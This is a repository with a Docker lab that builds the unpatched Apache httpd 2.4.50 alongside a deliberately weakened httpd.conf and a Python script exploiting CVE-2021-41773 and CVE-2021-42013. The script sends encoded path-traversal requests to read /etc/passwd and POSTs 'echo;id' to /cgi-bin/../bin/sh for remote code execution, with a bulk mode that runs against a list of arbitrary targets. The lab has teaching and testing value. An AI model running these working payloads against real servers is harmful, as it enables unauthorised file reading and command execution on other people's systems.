├── Dockerfile
├── README.md
├── cve-2021-42013.py
└── httpd.conf
/Dockerfile:
--------------------------------------------------------------------------------
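# syntax=docker/dockerfile:1
# Lab image for CVE-2021-42013: builds the unpatched Apache httpd 2.4.50
# release from source.  The httpd version is pinned on purpose -- it is the
# subject of the lab -- so leave it alone when touching the rest of the file.
FROM ubuntu:20.04

# Toolchain plus httpd's APR / APR-util / PCRE dependencies.  `update` and
# `install` share one layer so a cached, stale package index is never reused,
# and the index is removed in the same layer so it does not persist in the
# image.  ca-certificates (wget needs it for the HTTPS fetch below) and
# libc6-dev (the C headers gcc only *recommends*) are named explicitly
# because --no-install-recommends no longer pulls them in.
RUN apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        ca-certificates \
        curl \
        gcc \
        libapr1-dev \
        libaprutil1-dev \
        libc6-dev \
        libpcre3-dev \
        make \
        perl \
        wget \
    && rm -rf /var/lib/apt/lists/*

# Build out of tree under /usr/src/httpd (the original did the same from /)
# and install with --prefix=/ so the layout httpd.conf relies on is kept:
# /bin/httpd, /conf, /htdocs, /icons, /cgi-bin, /modules, /logs.  Sources and
# build artefacts are removed in the same layer that created them.
# NOTE(review): the tarball is fetched over HTTPS but its digest is not
# verified; check it with `sha256sum -c` against the .sha256 file published
# next to the archive on archive.apache.org before trusting the build.
WORKDIR /usr/src/httpd
RUN wget -q https://archive.apache.org/dist/httpd/httpd-2.4.50.tar.gz \
    && tar -xf httpd-2.4.50.tar.gz \
    && ./httpd-2.4.50/configure --prefix=/ \
    && make \
    && make install \
    && rm -rf /usr/src/httpd/*
WORKDIR /

# Plain local file: COPY rather than ADD (no extraction or URL fetch wanted).
COPY httpd.conf /conf/httpd.conf

# Syntax-check the configuration at build time instead of starting httpd in
# a RUN step: a server started during the build does not survive into the
# container, and whatever it wrote under /logs (pid file, logs) was baked
# into the image.
RUN httpd -t

EXPOSE 80

# httpd must start as root to bind port 80; it then drops its worker
# processes to the User/Group set in httpd.conf.  Exec form keeps httpd as
# PID 1 so `docker stop` delivers SIGTERM straight to it.
ENTRYPOINT ["httpd", "-D", "FOREGROUND"]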
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Apache 2.4.50 - Path Traversal or Remote Code Execution
2 | cve-2021-42013.py is a Python script that checks for the Path Traversal or Remote Code Execution vulnerability in [Apache 2.4.50](https://archive.apache.org/dist/httpd/httpd-2.4.50.tar.gz). A deliberately vulnerable Docker image is provided so you can get hands-on with [CVE-2021-42013](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013).
3 |
4 | If CGI-BIN is enabled, then Remote Code Execution can be performed but Path Traversal cannot, so an "icons" directory has been added under the Alias section in httpd.conf for checking the Path Traversal vulnerability.
5 |
6 | # Vulnerable Configurations in httpd.conf
7 | ```
8 | 1. Enable CGI-BIN
9 | 2. Add "icons" directory in Alias section
10 | 3. Require all granted
11 | ```
12 |
13 | # Lab for CVE-2021-42013
14 | ### Build Docker
15 | ```
16 | $ docker build -t cve-2021-42013 .
17 | ```
18 | ### Run Docker
19 | ```
20 | $ docker run -it cve-2021-42013
21 | ```
22 |
23 | # Usage cve-2021-42013.py
24 | ### Check for Path Traversal and Remote Code Execution
25 | ```
26 | $ python3 cve-2021-42013.py -u http://172.17.0.2
27 | ```
28 |
29 | ### Path Traversal PoC
30 | ```
31 | $ python3 cve-2021-42013.py -u http://172.17.0.2 -pt
32 | ```
33 |
34 | ### Remote Code Execution PoC
35 | ```
36 | $ python3 cve-2021-42013.py -u http://172.17.0.2 -rce
37 | ```
38 |
39 | ### For bulk scanning, provide a text file with one target URL (including http:// or https://) per line:
40 | ```
41 | $ python3 cve-2021-42013.py -l list.txt
42 | ```
43 | ```
44 | $ python3 cve-2021-42013.py -l list.txt -pt
45 | ```
46 | ```
47 | $ python3 cve-2021-42013.py -l list.txt -rce
48 | ```
49 |
50 | More information can be found [here](https://walnutsecurity.com/path-traversal-remote-code-execution-in-apache/).
51 |
52 | ### References
53 | * https://nvd.nist.gov/vuln/detail/CVE-2021-42013
54 | * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
55 | * https://www.cve.org/CVERecord?id=CVE-2021-42013
56 | * https://httpd.apache.org/security/vulnerabilities_24.html
57 | * https://walnutsecurity.com/path-traversal-remote-code-execution-in-apache/
58 |
--------------------------------------------------------------------------------
/cve-2021-42013.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | '''
4 | CVE: 2021-42013
5 | Tested on: 2.4.49 and 2.4.50
6 | Description: Path Traversal or Remote Code Execution vulnerabilities were found in Apache 2.4.49 and 2.4.50
7 | Script Author: @nirav4peace
8 | Company: Walnut Security Services Pvt. Ltd.
9 | Website: https://walnutsecurity.com
10 | '''
11 |
import argparse
import os
import sys
import urllib
import urllib.error
import urllib.parse
import urllib.request
from os import path

import requests
18 |
19 | #User-Agent
20 | user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
21 |
22 | #Usage Instructions
23 | usage = "\n- cve-2021-42013.py -u domain.com\n- cve-2021-42013.py -u domain.com -pt\n- cve-2021-42013.py -u domain.com -rce"
24 | description = "cve-2021-42013.py is a python script to check for Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50"
25 |
26 | #Arguments Parser
27 | parser = argparse.ArgumentParser(usage=usage, description=description)
28 | parser.add_argument("-u", dest="url", type=str, help="Specify a domain/ip to scan for CVE-2021-42013.")
29 | parser.add_argument("-pt", dest="pt", action="store_true", help="This will check only for Path Traversal vulnerability.")
30 | parser.add_argument("-rce", dest="rce", action="store_true", help="This will check only for Remote Code Execution vulnerability.")
31 | parser.add_argument("-l", dest="list", help="Specify a file to bulk scan for CVE-2021-42013.")
32 | args = parser.parse_args()
33 |
34 | vuln_ind = 0
35 |
36 | #Check for valid URL format and connectivity
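def urlCheck(url):
    """HEAD-probe ``url`` and return the ``requests`` response.

    Doubles as the URL-format and connectivity check: every error class
    handled below prints a message and terminates the script with
    ``sys.exit()`` instead of returning.  ``user_agent`` is a module global.

    Args:
        url: Target including its scheme, e.g. ``http://172.17.0.2``.

    Returns:
        The ``requests.Response`` of the HEAD request; callers read
        ``resp.headers['server']`` from it.
    """
    try:
        # The ReadTimeout message below promises a 10s limit, but the original
        # passed no timeout at all, so an unresponsive host hung the scan.
        resp = requests.head(url, headers={"User-Agent": user_agent}, timeout=10)
        return resp
    # One flat try with five handlers replaces five nested trys: none of these
    # exception classes derives from another, so handler order is not
    # observable, and SystemExit raised inside a handler was never caught by
    # an outer one either.
    except requests.exceptions.InvalidURL:
        print ("\n[-] Provided URL is invalid. Please specify valid URL.\n")
        sys.exit()
    except requests.exceptions.InvalidSchema:
        print ("\n[-] You have provided wrong protocol in "+url+", it must be (http:// or https://)\n")
        sys.exit()
    except requests.exceptions.MissingSchema:
        print ("\n[-] You need to specify protocol (http:// or https://) in "+url+"\n")
        sys.exit()
    except requests.exceptions.ReadTimeout:
        print ("\n[-] Server has not responded within 10s for the domain "+url+"\n")
        sys.exit()
    except requests.exceptions.ConnectionError:
        print ("\n[-] Unable to connect to the domain "+url+"\n")
        sys.exit()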
60 |
def exploitPT(payload, cve_id):
    """Send one path-traversal probe for ``cve_id`` and report the outcome.

    Reads module globals: ``url`` (the target, set by the dispatch at the
    bottom of the file -- it is *not* the parameter) and ``user_agent``;
    sets ``vuln_ind`` when the probe succeeds.

    Args:
        payload: Request path, already percent-encoded by the caller.
        cve_id: Label used in the printed result lines.
    """
    # safe="/%" keeps the caller's pre-encoded %2e / %%32%65 sequences intact;
    # a plain quote() would escape the percent signs themselves.
    payload = url + urllib.parse.quote(payload, safe="/%")
    print ("[+] Executing payload "+payload)
    try:
        request = urllib.request.Request(payload, headers={"User-Agent": user_agent})
        response = urllib.request.urlopen(request)
        res = response.read().decode("utf-8")
        # Success heuristic: the response body looks like a passwd file.
        if "root:" in res:
            print ("[!] "+url+" is vulnerable to Path Traversal Attack ("+cve_id+")")
            print ("[+] Response:")
            print (res)
            global vuln_ind
            # NOTE(review): "=+ 1" assigns +1 rather than incrementing.  Since
            # vuln_ind starts at 0 and callers only test it for zero, the
            # observable effect is the same.
            vuln_ind =+ 1
        else:
            print ("[!] "+url+" is not vulnerable to "+cve_id+"\n")
    # Only HTTP error statuses (403/404/...) count as "not vulnerable"; a
    # urllib.error.URLError from a failed connection is not caught here.
    except urllib.error.HTTPError:
        print ("[!] "+url+" is not vulnerable to "+cve_id+"\n")
78 |
def exploitRCE(payload, cve_id):
    """Send one cgi-bin traversal probe for ``cve_id`` and report the outcome.

    Reads module globals ``url`` and ``user_agent``.  Unlike exploitPT this
    function never touches ``vuln_ind``, so a hit here does not influence
    the fallback logic in pathTraversal/RCE.

    Args:
        payload: Request path, already percent-encoded by the caller.
        cve_id: Label used in the printed result lines.
    """
    # safe="/%" keeps the caller's pre-encoded percent sequences intact.
    payload = url + urllib.parse.quote(payload, safe="/%")
    # Giving Request a body makes urllib send a POST.
    data = "echo;id"
    data = data.encode("ascii")
    print ("[+] Executing payload "+payload)
    try:
        request = urllib.request.Request(payload, data=data, headers={"User-Agent": user_agent})
        response = urllib.request.urlopen(request)
        res = response.read().decode("utf-8")
        # Success heuristic: the response body carries id(1)-style output.
        if "uid=" in res:
            print ("[!] "+url+" is vulnerable to Remote Code Execution attack ("+cve_id+")")
            print ("[+] Response:")
            print (res)
        else:
            print ("[!] "+url+" is not vulnerable to "+cve_id+"\n")
    # Only HTTP error statuses count as "not vulnerable"; a connection-level
    # urllib.error.URLError is not caught here.
    except urllib.error.HTTPError:
        print ("[!] "+url+" is not vulnerable to "+cve_id+"\n")
96 |
def pathTraversal(url):
    """Pick the traversal probe from the Server banner and run it.

    A banner containing "49" selects the single-encoded CVE-2021-41773 form,
    "50" the double-encoded CVE-2021-42013 form; any other banner tries the
    first and then the second, the second only if ``vuln_ind`` is still 0.

    Defender's view: either probe shows up in the access log (``%r`` in the
    ``common`` LogFormat) as a request for ``/icons/...`` whose path holds
    ``.%2e`` or ``%%32%65`` segments ending in ``/etc/passwd``.  It is
    served here only because the ``/icons`` alias is granted and the
    filesystem root is not ``Require all denied`` as in the stock config.
    """
    resp = urlCheck(url)
    # KeyError if the target sends no Server header at all.
    version = resp.headers['server']
    # Substring match on the whole banner, not a parsed version number.
    if "49" in version:
        cve_id = "CVE-2021-41773"
        payload = "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
        exploitPT(payload, cve_id)

    elif "50" in version:
        cve_id = "CVE-2021-42013"
        payload = "/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
        exploitPT(payload, cve_id)

    else:
        cve_id = "CVE-2021-41773"
        payload = "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
        exploitPT(payload, cve_id)
        # NOTE(review): nesting reconstructed from a whitespace-stripped copy;
        # this fallback is grouped with the else branch per the original's
        # blank-line layout -- confirm against the real source file.
        if vuln_ind == 0:
            cve_id = "CVE-2021-42013"
            payload = "/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"
            exploitPT(payload, cve_id)
118 |
def RCE(url):
    """Pick the cgi-bin traversal probe from the Server banner and run it.

    Same banner logic as pathTraversal, with the probes aimed at
    ``/cgi-bin/`` (the ScriptAlias in httpd.conf) instead of ``/icons/``.
    Because exploitRCE never sets ``vuln_ind``, the final fallback here
    depends only on whether pathTraversal already scored a hit.
    """
    resp = urlCheck(url)
    # KeyError if the target sends no Server header at all.
    version = resp.headers['server']
    # Substring match on the whole banner, not a parsed version number.
    if "49" in version:
        cve_id = "CVE-2021-41773"
        payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
        exploitRCE(payload, cve_id)

    elif "50" in version:
        cve_id = "CVE-2021-42013"
        payload = "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"
        exploitRCE(payload, cve_id)

    else:
        cve_id = "CVE-2021-41773"
        payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
        exploitRCE(payload, cve_id)
        # NOTE(review): nesting reconstructed from a whitespace-stripped copy;
        # this fallback is grouped with the else branch per the original's
        # blank-line layout -- confirm against the real source file.
        if vuln_ind == 0:
            cve_id = "CVE-2021-42013"
            payload = "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"
            exploitRCE(payload, cve_id)
140 |
def execute(url):
    """Run the checks selected on the command line against one target.

    ``-pt`` and ``-rce`` each run only their own check (both flags run
    both); with neither flag both checks run.  Reads the module-level
    ``args``.

    Args:
        url: Target passed straight through to pathTraversal / RCE.
    """
    ran_selected = False
    if args.pt:
        pathTraversal(url)
        ran_selected = True
    if args.rce:
        RCE(url)
        ran_selected = True
    if not ran_selected:
        pathTraversal(url)
        RCE(url)
152 |
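# Entry point: exactly one of -u (single target) or -l (file of targets).
if args.url and args.list:
    print("[-] Specify only one parameter '-u' or '-l'")

elif args.url:
    # `url` is a module global that exploitPT / exploitRCE read directly.
    url = args.url
    execute(url)

elif args.list:
    if not os.path.exists(args.list):
        print ("\n[-] No such list found in the given path.\n")
        sys.exit()
    # Close the list file deterministically instead of leaving it to the GC.
    with open(args.list) as list_file:
        lists = list_file.read().splitlines()
    for url in lists:
        # A blank line would otherwise abort the whole run through urlCheck's
        # MissingSchema handler, so skip it.
        if not url.strip():
            continue
        execute(url)
else:
    print("[-] No parameters given. Please see help by '-h'\n")
    sys.exit()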
170 |
--------------------------------------------------------------------------------
/httpd.conf:
--------------------------------------------------------------------------------
1 | #
2 | # This is the main Apache HTTP server configuration file. It contains the
3 | # configuration directives that give the server its instructions.
4 | # See <URL:http://httpd.apache.org/docs/2.4/> for detailed information.
5 | # In particular, see
6 | # <URL:http://httpd.apache.org/docs/2.4/mod/directives.html>
7 | # for a discussion of each configuration directive.
8 | #
9 | # Do NOT simply read the instructions in here without understanding
10 | # what they do. They're here only as hints or reminders. If you are unsure
11 | # consult the online docs. You have been warned.
12 | #
13 | # Configuration and logfile names: If the filenames you specify for many
14 | # of the server's control files begin with "/" (or "drive:/" for Win32), the
15 | # server will use that explicit path. If the filenames do *not* begin
16 | # with "/", the value of ServerRoot is prepended -- so "logs/access_log"
17 | # with ServerRoot set to "/usr/local/apache2" will be interpreted by the
18 | # server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log"
19 | # will be interpreted as '/logs/access_log'.
20 |
21 | #
22 | # ServerRoot: The top of the directory tree under which the server's
23 | # configuration, error, and log files are kept.
24 | #
25 | # Do not add a slash at the end of the directory path. If you point
26 | # ServerRoot at a non-local disk, be sure to specify a local disk on the
27 | # Mutex directive, if file-based mutexes are used. If you wish to share the
28 | # same ServerRoot for multiple httpd daemons, you will need to change at
29 | # least PidFile.
30 | #
31 | ServerRoot "/"
32 |
33 | #
34 | # Mutex: Allows you to set the mutex mechanism and mutex file directory
35 | # for individual mutexes, or change the global defaults
36 | #
37 | # Uncomment and change the directory if mutexes are file-based and the default
38 | # mutex file directory is not on a local disk or is not appropriate for some
39 | # other reason.
40 | #
41 | # Mutex default:logs
42 |
43 | #
44 | # Listen: Allows you to bind Apache to specific IP addresses and/or
45 | # ports, instead of the default. See also the <VirtualHost>
46 | # directive.
47 | #
48 | # Change this to Listen on specific IP addresses as shown below to
49 | # prevent Apache from glomming onto all bound IP addresses.
50 | #
51 | #Listen 12.34.56.78:80
52 | Listen 80
53 |
54 | #
55 | # Dynamic Shared Object (DSO) Support
56 | #
57 | # To be able to use the functionality of a module which was built as a DSO you
58 | # have to place corresponding `LoadModule' lines at this location so the
59 | # directives contained in it are actually available _before_ they are used.
60 | # Statically compiled modules (those listed by `httpd -l') do not need
61 | # to be loaded here.
62 | #
63 | # Example:
64 | # LoadModule foo_module modules/mod_foo.so
65 | #
66 | LoadModule authn_file_module modules/mod_authn_file.so
67 | #LoadModule authn_dbm_module modules/mod_authn_dbm.so
68 | #LoadModule authn_anon_module modules/mod_authn_anon.so
69 | #LoadModule authn_dbd_module modules/mod_authn_dbd.so
70 | #LoadModule authn_socache_module modules/mod_authn_socache.so
71 | LoadModule authn_core_module modules/mod_authn_core.so
72 | LoadModule authz_host_module modules/mod_authz_host.so
73 | LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
74 | LoadModule authz_user_module modules/mod_authz_user.so
75 | #LoadModule authz_dbm_module modules/mod_authz_dbm.so
76 | #LoadModule authz_owner_module modules/mod_authz_owner.so
77 | #LoadModule authz_dbd_module modules/mod_authz_dbd.so
78 | LoadModule authz_core_module modules/mod_authz_core.so
79 | #LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
80 | LoadModule access_compat_module modules/mod_access_compat.so
81 | LoadModule auth_basic_module modules/mod_auth_basic.so
82 | #LoadModule auth_form_module modules/mod_auth_form.so
83 | #LoadModule auth_digest_module modules/mod_auth_digest.so
84 | #LoadModule allowmethods_module modules/mod_allowmethods.so
85 | #LoadModule file_cache_module modules/mod_file_cache.so
86 | #LoadModule cache_module modules/mod_cache.so
87 | #LoadModule cache_disk_module modules/mod_cache_disk.so
88 | #LoadModule cache_socache_module modules/mod_cache_socache.so
89 | #LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
90 | #LoadModule socache_dbm_module modules/mod_socache_dbm.so
91 | #LoadModule socache_memcache_module modules/mod_socache_memcache.so
92 | #LoadModule socache_redis_module modules/mod_socache_redis.so
93 | #LoadModule watchdog_module modules/mod_watchdog.so
94 | #LoadModule macro_module modules/mod_macro.so
95 | #LoadModule dbd_module modules/mod_dbd.so
96 | #LoadModule dumpio_module modules/mod_dumpio.so
97 | #LoadModule buffer_module modules/mod_buffer.so
98 | #LoadModule ratelimit_module modules/mod_ratelimit.so
99 | LoadModule reqtimeout_module modules/mod_reqtimeout.so
100 | #LoadModule ext_filter_module modules/mod_ext_filter.so
101 | #LoadModule request_module modules/mod_request.so
102 | #LoadModule include_module modules/mod_include.so
103 | LoadModule filter_module modules/mod_filter.so
104 | #LoadModule substitute_module modules/mod_substitute.so
105 | #LoadModule sed_module modules/mod_sed.so
106 | LoadModule mime_module modules/mod_mime.so
107 | #LoadModule ldap_module modules/mod_ldap.so
108 | LoadModule log_config_module modules/mod_log_config.so
109 | #LoadModule log_debug_module modules/mod_log_debug.so
110 | #LoadModule logio_module modules/mod_logio.so
111 | LoadModule env_module modules/mod_env.so
112 | #LoadModule expires_module modules/mod_expires.so
113 | LoadModule headers_module modules/mod_headers.so
114 | #LoadModule unique_id_module modules/mod_unique_id.so
115 | LoadModule setenvif_module modules/mod_setenvif.so
116 | LoadModule version_module modules/mod_version.so
117 | #LoadModule remoteip_module modules/mod_remoteip.so
118 | #LoadModule proxy_module modules/mod_proxy.so
119 | #LoadModule proxy_connect_module modules/mod_proxy_connect.so
120 | #LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
121 | #LoadModule proxy_http_module modules/mod_proxy_http.so
122 | #LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so
123 | #LoadModule proxy_scgi_module modules/mod_proxy_scgi.so
124 | #LoadModule proxy_uwsgi_module modules/mod_proxy_uwsgi.so
125 | #LoadModule proxy_fdpass_module modules/mod_proxy_fdpass.so
126 | #LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so
127 | #LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
128 | #LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
129 | #LoadModule proxy_express_module modules/mod_proxy_express.so
130 | #LoadModule proxy_hcheck_module modules/mod_proxy_hcheck.so
131 | #LoadModule session_module modules/mod_session.so
132 | #LoadModule session_cookie_module modules/mod_session_cookie.so
133 | #LoadModule session_crypto_module modules/mod_session_crypto.so
134 | #LoadModule session_dbd_module modules/mod_session_dbd.so
135 | #LoadModule slotmem_shm_module modules/mod_slotmem_shm.so
136 | #LoadModule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so
137 | #LoadModule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so
138 | #LoadModule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so
139 | #LoadModule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so
140 | LoadModule unixd_module modules/mod_unixd.so
141 | #LoadModule dav_module modules/mod_dav.so
142 | LoadModule status_module modules/mod_status.so
143 | LoadModule autoindex_module modules/mod_autoindex.so
144 | #LoadModule info_module modules/mod_info.so
145 | LoadModule cgid_module modules/mod_cgid.so
146 | #LoadModule dav_fs_module modules/mod_dav_fs.so
147 | #LoadModule vhost_alias_module modules/mod_vhost_alias.so
148 | #LoadModule negotiation_module modules/mod_negotiation.so
149 | LoadModule dir_module modules/mod_dir.so
150 | #LoadModule actions_module modules/mod_actions.so
151 | #LoadModule speling_module modules/mod_speling.so
152 | #LoadModule userdir_module modules/mod_userdir.so
153 | LoadModule alias_module modules/mod_alias.so
154 | #LoadModule rewrite_module modules/mod_rewrite.so
155 |
156 |
157 | #
158 | # If you wish httpd to run as a different user or group, you must run
159 | # httpd as root initially and it will switch.
160 | #
161 | # User/Group: The name (or #number) of the user/group to run httpd as.
162 | # It is usually good practice to create a dedicated user and group for
163 | # running httpd, as with most system services.
164 | #
165 | User daemon
166 | Group daemon
167 |
168 |
169 |
170 | # 'Main' server configuration
171 | #
172 | # The directives in this section set up the values used by the 'main'
173 | # server, which responds to any requests that aren't handled by a
174 | # <VirtualHost> definition. These values also provide defaults for
175 | # any <VirtualHost> containers you may define later in the file.
176 | #
177 | # All of these directives may appear inside <VirtualHost> containers,
178 | # in which case these default settings will be overridden for the
179 | # virtual host being defined.
180 | #
181 |
182 | #
183 | # ServerAdmin: Your address, where problems with the server should be
184 | # e-mailed. This address appears on some server-generated pages, such
185 | # as error documents. e.g. admin@your-domain.com
186 | #
187 | ServerAdmin you@example.com
188 |
189 | #
190 | # ServerName gives the name and port that the server uses to identify itself.
191 | # This can often be determined automatically, but we recommend you specify
192 | # it explicitly to prevent problems during startup.
193 | #
194 | # If your host doesn't have a registered DNS name, enter its IP address here.
195 | #
196 | #ServerName www.example.com:80
197 |
198 | #
199 | # Stock httpd.conf denies access to the entirety of the server's filesystem
200 | # here and permits web content directories explicitly in other <Directory>
201 | # blocks below. This lab grants it instead -- the README lists this
202 | # "Require all granted" among the deliberately vulnerable settings.
203 |
204 | AllowOverride none
205 | Require all granted
206 |
207 |
208 | #
209 | # Note that from this point forward you must specifically allow
210 | # particular features to be enabled - so if something's not working as
211 | # you might expect, make sure that you have specifically enabled it
212 | # below.
213 | #
214 |
215 | #
216 | # DocumentRoot: The directory out of which you will serve your
217 | # documents. By default, all requests are taken from this directory, but
218 | # symbolic links and aliases may be used to point to other locations.
219 | #
220 | DocumentRoot "/htdocs"
221 |
222 | #
223 | # Possible values for the Options directive are "None", "All",
224 | # or any combination of:
225 | # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
226 | #
227 | # Note that "MultiViews" must be named *explicitly* --- "Options All"
228 | # doesn't give it to you.
229 | #
230 | # The Options directive is both complicated and important. Please see
231 | # http://httpd.apache.org/docs/2.4/mod/core.html#options
232 | # for more information.
233 | #
234 | Options Indexes FollowSymLinks
235 |
236 | #
237 | # AllowOverride controls what directives may be placed in .htaccess files.
238 | # It can be "All", "None", or any combination of the keywords:
239 | # AllowOverride FileInfo AuthConfig Limit
240 | #
241 | AllowOverride None
242 |
243 | #
244 | # Controls who can get stuff from this server.
245 | #
246 | Require all granted
247 |
248 |
249 | #
250 | # DirectoryIndex: sets the file that Apache will serve if a directory
251 | # is requested.
252 | #
253 |
254 | DirectoryIndex index.html
255 |
256 |
257 | #
258 | # The following lines prevent .htaccess and .htpasswd files from being
259 | # viewed by Web clients.
260 | #
261 |
262 | Require all denied
263 |
264 |
265 | #
266 | # ErrorLog: The location of the error log file.
267 | # If you do not specify an ErrorLog directive within a <VirtualHost>
268 | # container, error messages relating to that virtual host will be
269 | # logged here. If you *do* define an error logfile for a <VirtualHost>
270 | # container, that host's errors will be logged there and not here.
271 | #
272 | ErrorLog "logs/error_log"
273 |
274 | #
275 | # LogLevel: Control the number of messages logged to the error_log.
276 | # Possible values include: debug, info, notice, warn, error, crit,
277 | # alert, emerg.
278 | #
279 | LogLevel warn
280 |
281 |
282 | #
283 | # The following directives define some format nicknames for use with
284 | # a CustomLog directive (see below).
285 | #
286 | LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
287 | LogFormat "%h %l %u %t \"%r\" %>s %b" common
288 |
289 |
290 | # You need to enable mod_logio.c to use %I and %O
291 | LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
292 |
293 |
294 | #
295 | # The location and format of the access logfile (Common Logfile Format).
296 | # If you do not define any access logfiles within a <VirtualHost>
297 | # container, they will be logged here. Contrariwise, if you *do*
298 | # define per-<VirtualHost> access logfiles, transactions will be
299 | # logged therein and *not* in this file.
300 | #
301 | CustomLog "logs/access_log" common
302 |
303 | #
304 | # If you prefer a logfile with access, agent, and referer information
305 | # (Combined Logfile Format) you can use the following directive.
306 | #
307 | #CustomLog "logs/access_log" combined
308 |
309 |
310 |
311 | #
312 | # Redirect: Allows you to tell clients about documents that used to
313 | # exist in your server's namespace, but do not anymore. The client
314 | # will make a new request for the document at its new location.
315 | # Example:
316 | # Redirect permanent /foo http://www.example.com/bar
317 |
318 | #
319 | # Alias: Maps web paths into filesystem paths and is used to
320 | # access content that does not live under the DocumentRoot.
321 | # Example:
322 | # Alias /webpath /full/filesystem/path
323 | #
324 | # If you include a trailing / on /webpath then the server will
325 | # require it to be present in the URL. You will also likely
326 | # need to provide a <Directory> section to allow access to
327 | # the filesystem path.
328 | Alias /icons /icons
329 |
330 | Require all granted
331 |
332 | #
333 | # ScriptAlias: This controls which directories contain server scripts.
334 | # ScriptAliases are essentially the same as Aliases, except that
335 | # documents in the target directory are treated as applications and
336 | # run by the server when requested rather than as documents sent to the
337 | # client. The same rules about trailing "/" apply to ScriptAlias
338 | # directives as to Alias.
339 | #
340 | ScriptAlias /cgi-bin/ "/cgi-bin/"
341 |
342 |
343 |
344 |
345 | #
346 | # ScriptSock: On threaded servers, designate the path to the UNIX
347 | # socket used to communicate with the CGI daemon of mod_cgid.
348 | #
349 | #Scriptsock cgisock
350 |
351 |
352 | #
353 | # "/cgi-bin" should be changed to whatever your ScriptAliased
354 | # CGI directory exists, if you have that configured.
355 | #
356 |
357 | AllowOverride None
358 | Options +ExecCGI
359 | Require all granted
360 |
361 |
362 |
363 | #
364 | # Avoid passing HTTP_PROXY environment to CGI's on this or any proxied
365 | # backend servers which have lingering "httpoxy" defects.
366 | # 'Proxy' request header is undefined by the IETF, not listed by IANA
367 | #
368 | RequestHeader unset Proxy early
369 |
370 |
371 |
372 | #
373 | # TypesConfig points to the file containing the list of mappings from
374 | # filename extension to MIME-type.
375 | #
376 | TypesConfig conf/mime.types
377 |
378 | #
379 | # AddType allows you to add to or override the MIME configuration
380 | # file specified in TypesConfig for specific file types.
381 | #
382 | #AddType application/x-gzip .tgz
383 | #
384 | # AddEncoding allows you to have certain browsers uncompress
385 | # information on the fly. Note: Not all browsers support this.
386 | #
387 | #AddEncoding x-compress .Z
388 | #AddEncoding x-gzip .gz .tgz
389 | #
390 | # If the AddEncoding directives above are commented-out, then you
391 | # probably should define those extensions to indicate media types:
392 | #
393 | AddType application/x-compress .Z
394 | AddType application/x-gzip .gz .tgz
395 |
396 | #
397 | # AddHandler allows you to map certain file extensions to "handlers":
398 | # actions unrelated to filetype. These can be either built into the server
399 | # or added with the Action directive (see below)
400 | #
401 | # To use CGI scripts outside of ScriptAliased directories:
402 | # (You will also need to add "ExecCGI" to the "Options" directive.)
403 | #
404 | #AddHandler cgi-script .cgi
405 |
406 | # For type maps (negotiated resources):
407 | #AddHandler type-map var
408 |
409 | #
410 | # Filters allow you to process content before it is sent to the client.
411 | #
412 | # To parse .shtml files for server-side includes (SSI):
413 | # (You will also need to add "Includes" to the "Options" directive.)
414 | #
415 | #AddType text/html .shtml
416 | #AddOutputFilter INCLUDES .shtml
417 |
418 |
419 | #
420 | # The mod_mime_magic module allows the server to use various hints from the
421 | # contents of the file itself to determine its type. The MIMEMagicFile
422 | # directive tells the module where the hint definitions are located.
423 | #
424 | #MIMEMagicFile conf/magic
425 |
426 | #
427 | # Customizable error responses come in three flavors:
428 | # 1) plain text 2) local redirects 3) external redirects
429 | #
430 | # Some examples:
431 | #ErrorDocument 500 "The server made a boo boo."
432 | #ErrorDocument 404 /missing.html
433 | #ErrorDocument 404 "/cgi-bin/missing_handler.pl"
434 | #ErrorDocument 402 http://www.example.com/subscription_info.html
435 | #
436 |
437 | #
438 | # MaxRanges: Maximum number of Ranges in a request before
439 | # returning the entire resource, or one of the special
440 | # values 'default', 'none' or 'unlimited'.
441 | # Default setting is to accept 200 Ranges.
442 | #MaxRanges unlimited
443 |
444 | #
445 | # EnableMMAP and EnableSendfile: On systems that support it,
446 | # memory-mapping or the sendfile syscall may be used to deliver
447 | # files. This usually improves server performance, but must
448 | # be turned off when serving from networked-mounted
449 | # filesystems or if support for these functions is otherwise
450 | # broken on your system.
451 | # Defaults: EnableMMAP On, EnableSendfile Off
452 | #
453 | #EnableMMAP off
454 | #EnableSendfile on
455 |
456 | # Supplemental configuration
457 | #
458 | # The configuration files in the conf/extra/ directory can be
459 | # included to add extra features or to modify the default configuration of
460 | # the server, or you may simply copy their contents here and change as
461 | # necessary.
462 |
463 | # Server-pool management (MPM specific)
464 | #Include conf/extra/httpd-mpm.conf
465 |
466 | # Multi-language error messages
